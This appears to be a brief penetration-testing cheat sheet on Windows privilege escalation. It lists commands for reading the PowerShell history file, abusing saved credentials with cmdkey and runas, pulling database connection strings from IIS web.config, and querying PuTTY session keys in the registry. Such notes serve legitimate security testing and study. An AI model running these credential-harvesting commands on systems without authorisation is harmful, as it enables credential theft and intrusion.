Privilege Escalation
Windows Privilege Escalation methods
Harvest credentials from unattended intallation
Check Powershell History
cmd.exe %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txtSaved Windows Credentials
cmdkey /listrunas /savecred /user:admin cmd.exeDatabase credentials from IIS settings
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionStringPutty Credentials
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /sManipulate binary or task to have it run as privileged user
Tools
Last updated